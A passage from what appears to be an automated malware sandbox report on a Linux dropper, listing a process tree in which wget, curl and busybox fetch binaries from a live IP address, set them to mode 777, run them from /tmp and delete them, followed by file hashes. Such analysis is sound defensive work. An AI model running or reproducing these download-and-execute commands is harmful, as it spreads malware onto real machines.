/bin/chmodchmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:885
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:886
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:888
-
-
/bin/chmodchmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:892
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:893
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:895
-
-
/bin/chmodchmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:898
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:899
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:901
-
-
/bin/chmodchmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:906
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:907
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:909
-
-
/bin/chmodchmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:912
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:913
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:915
-
-
/bin/chmodchmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:918
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:919
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97